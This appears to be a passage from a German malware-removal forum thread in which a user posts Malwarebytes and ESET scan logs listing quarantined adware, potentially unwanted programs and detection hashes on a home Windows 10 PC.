PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\bingsearch.full@microsoft.com\search-settings.jsm, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\gmp-eme-adobe\12\eme-adobe.dll, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\gmp-eme-adobe\12\eme-adobe.info, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\gmp-eme-adobe\12\eme-adobe.voucher, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\gmp-gmpopenh264\1.5.1\gmpopenh264.dll, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\gmp-gmpopenh264\1.5.1\gmpopenh264.info, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\healthreport\state.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\saved-telemetry-pings\eb83a39e-2542-4b9b-8f15-92b074184ca6, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage\permanent\chrome\.metadata, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage\permanent\chrome\idb\2918063365piupsah.sqlite, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage\permanent\moz-safe-about+home\.metadata, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\webapps\webapps.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.CleanBrowser, C:\Windows\run.vbs, In Quarantäne, [168fd9d90e8bd3633d90333fcd3801ff],

Physische Sektoren: 0
(keine bösartigen Elemente erkannt)


(end)
ESET

Code:
ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=4267ce6f66cc824991ec2ef4c0222f3f
# end=init
# utc_time=2016-04-30 04:22:15
# local_time=2016-04-30 06:22:15 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# osver=6.2.9200 NT
Update Init
Update Download
Update Finalize
Updated modules version: 29317
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=4267ce6f66cc824991ec2ef4c0222f3f
# end=updated
# utc_time=2016-04-30 04:25:26
# local_time=2016-04-30 06:25:26 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# osver=6.2.9200 NT
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7777
# api_version=3.1.1
# EOSSerial=4267ce6f66cc824991ec2ef4c0222f3f
# engine=29317
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2016-04-30 05:15:47
# local_time=2016-04-30 07:15:47 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# lang=1031
# osver=6.2.9200 NT
# compatibility_mode_1=''
# compatibility_mode=5893 16776573 100 94 8767 15850690 0 0
# scanned=362877
# found=47
# cleaned=0
# scan_time=3020
sh=B00D7D54417F83530AB41C1D45CECB48DC796FCF ft=1 fh=e9dfcaac72e84e00 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\AdbWinApi.dll"
sh=5ADCA9DD3BF59F20C0B0CBB12D35F2EF0849982A ft=1 fh=66c61548f23272de vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\AdbWinUsbApi.dll"
sh=1A61B312A4C24359798ED1DCA279564AB10A4809 ft=1 fh=096b4dbafc5e1e8c vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\AndriodServer.dll"
sh=9B3DB936D99C7E4068AB0EE40D01A3EA12F93516 ft=1 fh=7237caf261b5e620 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\BrowserPlugIn.dll"
sh=47B0D6CD29DDD112644FDBEEFC5FBA12BD4454F0 ft=1 fh=c1eed43ba38a9c9c vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Cleaner.dll"
sh=523D9F4DD4F306213D7F391E5F09ED617AB8AC9E ft=1 fh=6ac48a109c808eae vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Database.dll"
sh=563CA7FA5E43EF24D45268B58AA2678C69D4979D ft=1 fh=538485d7e2a3acd4 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\LogReport.dll"
sh=43A933E2395C4A3C1A70EF0120B7F32FB614E15B ft=1 fh=7525d64b17104be4 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\LpcManager.dll"
sh=E50E257A2772B05ABDC5B1301348F3A7BCD31037 ft=1 fh=2b8d001a6e136e5f vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Monitor.dll"
sh=38AC9F35E07275308456A86AB74010ACFBE697C4 ft=1 fh=9c4a371b2e91dd7c vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\MPCProtectService.exe"
sh=D8369B07B0B92C86C7DECE8665EA79940841BA10 ft=1 fh=a8ac21aeacc5ea50 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\MpcSafeDll.dll"
sh=73D9CF58402E2A780E175B88518645DEC6FC4468 ft=1 fh=30e0ff1cd945f251 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\MpcSafeDll64.dll"
sh=937836780BB991A61B3FC9EE896D85933B0B931F ft=1 fh=bde1161c33ed8972 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\MPCTray.exe"
sh=803B51C4D42E07BB41210CD4E01DFC213C9901DA ft=1 fh=a69f57b34d489c4e vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\MPCTray64.exe"
sh=1CADB36329505892F0578833C2910E84C716269E ft=1 fh=642d361fe7b3a003 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Report.dll"
sh=47BEF3747FF0703C5710E292DC6FA29E1739425F ft=1 fh=9a9663366bd79724 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\SafeNavi.dll"
sh=37CB7B8ECF1AC40532B00988BD3141724AEE6AA4 ft=1 fh=ebeadf3162756b74 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\SafeNavi64.dll"
sh=1370B0833D91FA5D4734629896AD2A8A6BC7E66C ft=1 fh=496a06b43d427a62 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\SafeProtect.dll"
sh=53D8EE4FB02CAACC0253A6BFA01D309B437D7D20 ft=1 fh=c6a53c3acb635f13 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Support.dll"
sh=E0FC6B43F8FAC1C0D1037887E5EAF7B1F9C5F86A ft=1 fh=8749ca99a46fe69d vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\TrayFrame.dll"
sh=9FA4D99DE311E69F934643135F8EE32E44A98C41 ft=1 fh=ce96516d72baed57 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Update.dll"
sh=82C95690C090EC05FDE21F4372A8013DC9E7A281 ft=1 fh=4dee74180afd3662 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Utility.dll"
sh=86C97042F4A378EBA06C0F54D825F096B04CFC91 ft=1 fh=46ca724fc3cb0448 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Web.dll"
sh=F46740D4E2A0F7748FD7CACDFA827A93EE1E28C3 ft=1 fh=bb6779a801af24b3 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\WinService.dll"
sh=28EA52315FD6208C147068209C15A8CC69D2BFBE ft=1 fh=c1508f70874092d8 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\XBus.dll"
sh=A53E3FDC66DD1978D4B1E8C589BD42AAF81EA52A ft=1 fh=d751568959b41da2 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\XProcessBus.dll"
sh=73014EDE7B750F44B574947F3EDA1DB2BDB7344E ft=1 fh=b5af38d973c2376e vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\XSkin.dll"
sh=7BBA403FF536FCD057B03BC6C6DD60B30818E26F ft=1 fh=fbba1c879bfefdec vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Drivers\MPCBase_32.sys"
sh=46D69A4DD532E91014B6362D705D2FF4B6F3E2C5 ft=1 fh=9496a9c4bbce9a83 vn="Win64/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Drivers\MPCKpt.sys"
sh=75862FCA547282A04952F2AD1235A86A244D5BF5 ft=1 fh=b37c7f3bc1f3bf89 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Drivers\MPCKpt_vista_32.sys"
sh=46D69A4DD532E91014B6362D705D2FF4B6F3E2C5 ft=1 fh=9496a9c4bbce9a83 vn="Win64/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Drivers\MPCKpt_vista_64.sys"
sh=659F5A30DA39FEAE4B3EE7F0C40A24222AA3E27E ft=1 fh=4f1ab3efc78c0f94 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Drivers\MPCKpt_xp_32.sys"
sh=7FA3746CD92CF822FFA1D3AF4F0304655A7FA69F ft=1 fh=f7f39426f0cf8013 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Exe\ADC_qd00000.exe"
sh=27E6143704C268FD62E0184A7CFD9A5C3D2F411F ft=1 fh=975a97365d488128 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Microsoft.VC90.CRT\msvcm90.dll"
sh=8C861BA6F67B5455E787744720E69BCBB26CE772 ft=1 fh=5a66b0f4caa7c850 vn="Variante von Win32/Speedchecker.B evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\pc speed up\PCSUSD.exe.vir"
sh=CDD586DF54134E12C80C4D432F3DDBDFABD5E58F ft=1 fh=0e6624e2656c8b93 vn="Variante von Win32/Speedchecker.C evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\pc speed up\PCSUService.exe.vir"
sh=9B1F08431B8B0B259516C077B3360B8ED9DFDA0D ft=1 fh=95fadfb541ab9fba vn="Variante von Win32/Speedchecker.E evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\pc speed up\PCSUUCC.exe.vir"
sh=FD837CAF99F57B70A0E2AA9CFE6CC57B93BB02BD ft=1 fh=3a5f7428b641ef39 vn="Variante von Win32/Obfuscated.NFU Trojaner" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\QQBrowser\Update\0AD0C687FD476CAE2DF5F47FFC66340E\Update\chrome_elf.dll.vir"
sh=F5521AE7653644E27EB15E6E59F207F5F2942757 ft=1 fh=585623a91aaa5c22 vn="Win32/ELEX.HV evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\SearchesToYesbnd\ihpul.exe.vir"
sh=ADBC200F6EEABA9A36744339919BCA923ED9B16A ft=1 fh=c71c0011b7c271b9 vn="Variante von Win32/ELEX.HS evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\SearchesToYesbnd\wpm.exe.vir"
sh=754AE20F48D2621ECA30FF494813463E589D7ED0 ft=0 fh=0000000000000000 vn="Variante von Win32/Speedchecker.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Users\Harun\AppData\Local\Microsoft\Silverlight\OutOfBrowser\Speedchecker.PCSpeedUp\application.xap.vir"
sh=7E74FDF657B1A8803984F03AF74CD2D7DDAB620E ft=1 fh=46cd8c74ebc47fc9 vn="Variante von Win32/ELEX.HQ evtl. unerwünschte Anwendung" ac=I fn="C:\FRST\Quarantine\C\Program Files (x86)\eAHPeNhIUJ\eAHPeNhIUJ\bin\eAHPeNhIUJ_update.dll"
sh=7BD40B943D61C6193BD584657363ECAD79BC3D3D ft=0 fh=0000000000000000 vn="JS/Lightning.A evtl. unerwünschte Anwendung" ac=I fn="C:\FRST\Quarantine\C\Users\Harun\AppData\Roaming\ffgogogo\ffgogogo\Profiles\41A66E7E5EE1\extensions\deskCutv2@gmail.com\chrome\content\index.html"
sh=F338AF05B3C8FF9D60FB7FF772B2D9EE293353C9 ft=0 fh=0000000000000000 vn="JS/Lightning.A evtl. unerwünschte Anwendung" ac=I fn="C:\FRST\Quarantine\C\Users\Harun\AppData\Roaming\ffgogogo\ffgogogo\Profiles\41A66E7E5EE1\extensions\deskCutv2@gmail.com\chrome\content\js\lib\jquery-2.1.0.min.js"
sh=66709C08173480EF5BC22ED8BF5CFD427276520B ft=0 fh=0000000000000000 vn="JS/Lightning.A evtl. unerwünschte Anwendung" ac=I fn="C:\FRST\Quarantine\C\Users\Harun\AppData\Roaming\ffgogogo\ffgogogo\Profiles\41A66E7E5EE1\extensions\deskCutv2@gmail.com\chrome\content\js\module\mostgrid.js"
sh=827BD4E023C5CD9C32A65F39BE4F76B00879B8CB ft=0 fh=0000000000000000 vn="JS/Lightning.A evtl. unerwünschte Anwendung" ac=I fn="C:\FRST\Quarantine\C\Users\Harun\AppData\Roaming\ffgogogo\ffgogogo\Profiles\41A66E7E5EE1\extensions\deskCutv2@gmail.com\chrome\content\js\pack\common.js"
sh=BF187F6391DE04E413BDEA876241194418C2732A ft=0 fh=0000000000000000 vn="JS/Lightning.A evtl. unerwünschte Anwendung" ac=I fn="C:\FRST\Quarantine\C\Users\Harun\AppData\Roaming\ffgogogo\ffgogogo\Profiles\41A66E7E5EE1\extensions\deskCutv2@gmail.com\chrome\content\js\pack\xagainit.js"

StOony 01.05.2016 01:08
MBAM 1

Code:
Malwarebytes Anti-Malware
www.malwarebytes.org


Protection, 24.04.2016 22:02, SYSTEM, HARUN-PC, Protection, Malware Protection, Starting,
Protection, 24.04.2016 22:02, SYSTEM, HARUN-PC, Protection, Malware Protection, Started,
Protection, 24.04.2016 22:02, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Starting,
Protection, 24.04.2016 22:02, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Started,
Update, 24.04.2016 22:03, SYSTEM, HARUN-PC, Manual, Remediation Database, 2016.2.12.1, 2016.4.19.1,
Update, 24.04.2016 22:03, SYSTEM, HARUN-PC, Manual, Rootkit Database, 2016.2.8.1, 2016.4.17.1,
Update, 24.04.2016 22:03, SYSTEM, HARUN-PC, Manual, Domain Database, 2016.2.16.8, 2016.4.22.6,
Update, 24.04.2016 22:03, SYSTEM, HARUN-PC, Manual, Malware Database, 2016.2.16.6, 2016.4.24.5,
Update, 24.04.2016 22:03, SYSTEM, HARUN-PC, Manual, IP Database, 2016.2.8.1, 2016.4.7.1,
Protection, 24.04.2016 22:03, SYSTEM, HARUN-PC, Protection, Refresh, Starting,
Protection, 24.04.2016 22:03, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Stopping,
Protection, 24.04.2016 22:03, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Stopped,
Protection, 24.04.2016 22:03, SYSTEM, HARUN-PC, Protection, Refresh, Success,
Protection, 24.04.2016 22:03, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Starting,
Protection, 24.04.2016 22:03, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Started,
Scan, 24.04.2016 22:07, SYSTEM, HARUN-PC, Manual, Start: 24.04.2016 22:03, Dauer: 3 Min. 36 Sek., Bedrohungssuchlauf, Abgeschlossen, 0 Malware-Erkennung, 277 Nicht-Malware-Erkennungen,
Protection, 24.04.2016 22:08, SYSTEM, HARUN-PC, Protection, Malware Protection, Starting,
Protection, 24.04.2016 22:08, SYSTEM, HARUN-PC, Protection, Malware Protection, Started,
Protection, 24.04.2016 22:08, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Starting,
Protection, 24.04.2016 22:08, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Started,

(end)
MBAM 2

Code:
Malwarebytes Anti-Malware
www.malwarebytes.org

Suchlaufdatum: 24.04.2016
Suchlaufzeit: 22:03
Protokolldatei: MBAM 2.txt
Administrator: Ja

Version: 2.2.1.1043
Malware-Datenbank: v2016.04.24.05
Rootkit-Datenbank: v2016.04.17.01
Lizenz: Testversion
Malware-Schutz: Aktiviert
Schutz vor bösartigen Websites: Aktiviert
Selbstschutz: Deaktiviert

Betriebssystem: Windows 10
CPU: x64
Dateisystem: NTFS
Benutzer: Harun

Suchlauftyp: Bedrohungssuchlauf
Ergebnis: Abgeschlossen
Durchsuchte Objekte: 456629
Abgelaufene Zeit: 3 Min., 36 Sek.

Speicher: Aktiviert
Start: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Deaktiviert
Heuristik: Aktiviert
PUP: Aktiviert
PUM: Aktiviert

Prozesse: 0
(keine bösartigen Elemente erkannt)

Module: 0
(keine bösartigen Elemente erkannt)

Registrierungsschlüssel: 11
PUP.Optional.YesSearches, HKU\S-1-5-18\SOFTWARE\{A16B1AF7-982D-40C3-B5C1-633E1A6A6678}, In Quarantäne, [f6af59590e8b1d1915e07f4525dde21e],
PUP.Optional.YesSearches, HKU\S-1-5-21-2630849102-760198568-3561441068-1000\SOFTWARE\{A16B1AF7-982D-40C3-B5C1-633E1A6A6678}, In Quarantäne, [9510882ae6b3e65054a1e2e2bb472bd5],
PUP.Optional.YesSearches, HKLM\SOFTWARE\{A16B1AF7-982D-40C3-B5C1-633E1A6A6678}, In Quarantäne, [297c04ae9aff64d2bc39a3217191926e],
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\LAYERS\VC32LDR  , In Quarantäne, [c7ded2e0e8b1ee48cb5f6ae98183c040],
PUP.Optional.IFEO, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SKYPE.EXE, In Quarantäne, [6a3bab078f0a2214c849e54fe22244bc],
PUP.Optional.YesSearches, HKLM\SOFTWARE\MOZILLA\FIREFOX\{EB52F1AB-3C2B-424F-9794-833C687025CF}, In Quarantäne, [edb8971b9306ff371f5728166c97a957],
PUP.Optional.IFEO, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SKYPE.EXE, In Quarantäne, [b6ef159dfd9cc175f51c84b0a1639868],
PUP.Optional.Wajam, HKU\S-1-5-21-2630849102-760198568-3561441068-1004\SOFTWARE\WajIEnhance, In Quarantäne, [2a7b0ca6d2c7f640e800b3a2fa0abb45],
PUP.Optional.SystemHealer, HKU\S-1-5-21-2630849102-760198568-3561441068-1004\SOFTWARE\SYSTEM HEALER, In Quarantäne, [267fefc37821082ec6aeabe5c83c1be5],
PUP.Optional.Wajam, HKU\S-1-5-21-2630849102-760198568-3561441068-1009\SOFTWARE\WajIEnhance, In Quarantäne, [6f363b778a0fb185da0eee67e2221fe1],
PUP.Optional.SystemHealer, HKU\S-1-5-21-2630849102-760198568-3561441068-1009\SOFTWARE\SYSTEM HEALER, In Quarantäne, [5e471a98a7f22b0bf87cd3bd7391da26],

Registrierungswerte: 11
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\LAYERS\VC32Ldr  |{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 131019213678783523, In Quarantäne, [c7ded2e0e8b1ee48cb5f6ae98183c040]
PUP.Optional.IFEO, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SKYPE.EXE|Debugger, "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe", In Quarantäne, [6a3bab078f0a2214c849e54fe22244bc]
PUP.Optional.YesSearches, HKLM\SOFTWARE\MOZILLA\FIREFOX\{EB52F1AB-3C2B-424F-9794-833C687025CF}|hp, hxxp://www.yessearches.com/?ts=AHEpBnEoBn0qB0..&v=20160301&uid=0AD0C687FD476CAE2DF5F47FFC66340E&ptid=wak&mode=ffsengext, In Quarantäne, [edb8971b9306ff371f5728166c97a957]
PUP.Optional.YesSearches, HKLM\SOFTWARE\MOZILLA\FIREFOX\{EB52F1AB-3C2B-424F-9794-833C687025CF}|tab, hxxp://www.yessearches.com/?ts=AHEpBnEoBn0qB0..&v=20160301&uid=0AD0C687FD476CAE2DF5F47FFC66340E&ptid=wak&mode=ffsengext, In Quarantäne, [a203fcb62178cc6a04723806857e728e]
PUP.Optional.YesSearches, HKLM\SOFTWARE\MOZILLA\FIREFOX\{EB52F1AB-3C2B-424F-9794-833C687025CF}|sp, hxxp://www.yessearches.com/chrome.php?uid=0AD0C687FD476CAE2DF5F47FFC66340E&ptid=wak&q={searchTerms}&ts=AHEpBnEoBn0qB0..&v=20160301&mode=ffsengext, In Quarantäne, [7233bef4e9b00630db9bf648877c7789]
PUP.Optional.YesSearches, HKLM\SOFTWARE\MOZILLA\FIREFOX\{EB52F1AB-3C2B-424F-9794-833C687025CF}|surl, hxxp://www.yessearches.com/chrome.php?uid=0AD0C687FD476CAE2DF5F47FFC66340E&ptid=wak&ts=AHEpBnEoBn0qB0..&v=20160301&mode=ffexttoolbar&q=, In Quarantäne, [4e570fa36f2a5dd993e396a8c043a65a]
PUP.Optional.IFEO, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SKYPE.EXE|Debugger, "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe", In Quarantäne, [b6ef159dfd9cc175f51c84b0a1639868]
PUP.Optional.SystemHealer, HKU\S-1-5-21-2630849102-760198568-3561441068-1004\SOFTWARE\SYSTEM HEALER|HomePage, hxxp://systemhealer.com/, In Quarantäne, [267fefc37821082ec6aeabe5c83c1be5]
PUP.Optional.SystemHealer, HKU\S-1-5-21-2630849102-760198568-3561441068-1004\SOFTWARE\SYSTEM HEALER|SupportPage, hxxp://systemhealer.com/support/#contact, In Quarantäne, [f7ae62508d0c57df650f632d11f306fa]
PUP.Optional.SystemHealer, HKU\S-1-5-21-2630849102-760198568-3561441068-1009\SOFTWARE\SYSTEM HEALER|HomePage, hxxp://systemhealer.com/, In Quarantäne, [5e471a98a7f22b0bf87cd3bd7391da26]
PUP.Optional.SystemHealer, HKU\S-1-5-21-2630849102-760198568-3561441068-1009\SOFTWARE\SYSTEM HEALER|SupportPage, hxxp://systemhealer.com/support/#contact, In Quarantäne, [4f56e5cd9ffa39fd462e98f80df76f91]

Registrierungsdaten: 0
(keine bösartigen Elemente erkannt)

Ordner: 60
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\bookmarkbackups, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\crashes, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\crashes\events, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\datareporting, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\datareporting\archived, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\datareporting\archived\2015-10, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\content, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
